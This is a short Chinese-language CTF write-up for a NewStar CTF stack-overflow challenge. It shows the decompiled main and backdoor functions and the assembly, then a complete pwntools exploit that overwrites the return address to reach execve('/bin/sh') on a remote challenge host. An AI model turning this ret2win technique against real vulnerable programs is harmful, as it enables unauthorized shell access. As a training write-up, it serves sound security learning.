拖进IDA，查看

int __cdecl main(int argc, const char **argv, const char **envp)
{char buf[32]; // [rsp+0h] [rbp-20h] BYREFinit();puts("Welcome to NewStar CTF!!");puts("Show me your magic");read(0, buf, 0x100uLL);return 0;
}

main函数，里read函数，分配了32（0x20）个大小 指定了0x100，有栈溢出漏洞

int backdoor()
{puts("Congratulations!!!");return execve("/bin/sh", 0LL, 0LL);
}

又发现了后门函数，

; Attributes: bp-based framepublic backdoor
backdoor proc near
; __unwind {
endbr64
push    rbp
mov     rbp, rsp
lea     rax, s          ; "Congratulations!!!"
mov     rdi, rax        ; s
call    _puts
mov     edx, 0          ; envp
mov     esi, 0          ; argv
lea     rax, path       ; "/bin/sh"
mov     rdi, rax        ; path
call    _execve
nop
pop     rbp
retn
; } // starts at 4011FB
backdoor endp

查看起始地址 为4011FB

• payload = b'a'*(0x20 + 0x8) + p64(0x4011FB)

完整exp:

from __future__ import absolute_import
from pwn import *  
p=remote(u"node4.buuoj.cn",27131) 
payload = b'a'*(0x20 + 0x8) + p64(0x4011FB)
p.sendline(payload)
p.interactive()